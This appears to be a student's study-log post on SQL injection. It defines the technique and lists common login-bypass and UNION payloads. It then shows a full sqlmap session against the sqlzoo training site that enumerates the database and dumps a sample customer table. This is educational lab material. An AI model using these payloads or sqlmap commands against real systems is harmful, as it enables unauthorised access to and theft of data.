SQL Injection (SQLi)
SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites.
We did the interactive tutorial
http://sqlzoo.net/hack/index.html
and I spend the rest of the day learning the tool sqlmap and how blind SQL injections work.
The precise injection is dependent on the DB implementation, however, common techniques are:
- admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
....
Login as different user
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
This is a nice cheat sheet i used:
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
michael@michael-ThinkPad ~
% sqlmap -u http://sqlzoo.net/hack/passwd.pl\?name\=kek\&password\=keke -a !116
___
__H__
___ ___[(]_____ ___ ___ {1.2.5#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:21:03
[15:21:03] [INFO] resuming back-end DBMS 'mysql'
[15:21:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: name=' UNION ALL SELECT CONCAT(CONCAT('qkxqq','pUyojvlzZaeyrLAAEVzlrLEiwrYpdNchFgrjKOaW'),'qkkjq')-- fuyT&password=
---
[15:21:03] [INFO] the back-end DBMS is MySQL
[15:21:03] [INFO] fetching banner
web server operating system: Linux Fedora
web application technology: Apache 2.4.33
back-end DBMS: MySQL 5 (MariaDB fork)
banner: '10.2.14-MariaDB'
[15:21:04] [INFO] fetching current user
current user: 'hack@localhost'
[15:21:04] [INFO] fetching current database
current database: 'hack'
[15:21:04] [INFO] fetching server hostname
hostname: 'warp'
[15:21:04] [INFO] testing if current user is DBA
[15:21:04] [INFO] fetching current user
[15:21:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[15:21:04] [INFO] fetching database users
[15:21:04] [INFO] used SQL query returns 1 entries
database management system users [1]:
[*] 'hack'@'localhost'
[15:21:05] [INFO] fetching database users password hashes
[15:21:05] [WARNING] the SQL query provided does not return any output
[15:21:05] [ERROR] unable to retrieve the password hashes for the database users (probably because the DBMS current user has no read privileges over the relevant system database table(s))
[15:21:05] [INFO] fetching database users privileges
[15:21:05] [INFO] used SQL query returns 1 entries
database management system users privileges:
[*] 'hack'@'localhost' [1]:
privilege: USAGE
[15:21:05] [WARNING] on MySQL the concept of roles does not exist. sqlmap will enumerate privileges instead
[15:21:05] [INFO] fetching database users privileges
database management system users roles:
[*] 'hack'@'localhost' [1]:
role: USAGE
[15:21:05] [INFO] sqlmap will dump entries of all tables from all databases now
[15:21:05] [INFO] fetching database names
[15:21:05] [INFO] used SQL query returns 4 entries
[15:21:05] [INFO] resumed: hack
[15:21:05] [INFO] resumed: information_schema
[15:21:05] [INFO] resumed: movie
[15:21:05] [INFO] resumed: test
[15:21:05] [INFO] fetching tables for databases: 'hack, information_schema, movie, test'
[15:21:05] [INFO] used SQL query returns 102 entries
[15:21:05] [INFO] fetching columns for table 'Customer' in database 'test'
[15:21:05] [INFO] used SQL query returns 8 entries
[15:21:05] [INFO] resumed: "Company_ref","int(11)"
[15:21:05] [INFO] resumed: "Company_name","varchar(50)"
[15:21:05] [INFO] resumed: "Contact_id","int(11)"
[15:21:05] [INFO] resumed: "Address_1","varchar(50)"
[15:21:05] [INFO] resumed: "Address_2","varchar(50)"
[15:21:05] [INFO] resumed: "Town","varchar(50)"
[15:21:05] [INFO] resumed: "Postcode","varchar(50)"
[15:21:05] [INFO] resumed: "Telephone","varchar(50)"
[15:21:05] [INFO] fetching entries for table 'Customer' in database 'test'
[15:21:05] [INFO] used SQL query returns 50 entries
Database: test
Table: Customer
[50 entries]
+------------+---------------------+----------+-------------+-----------+--------------------------+-------------+-----------------------+
| Contact_id | Town | Postcode | Telephone | Address_2 | Address_1 | Company_ref | Company_name |
+------------+---------------------+----------+-------------+-----------+--------------------------+-------------+-----------------------+
| 112 | Dartford | DA48 5WU | 01001722832 | NULL | 53 Finger Gate | 100 | Haunt Services |
| 33 | Guildford | GY34 4ZH | 01004256920 | NULL | 34 Pyorrhea Green | 101 | Genus Ltd. |
| 111 | Harrow | HA32 6PP | 01012384042 | NULL | 67 Napery Green | 102 | Corps Ltd. |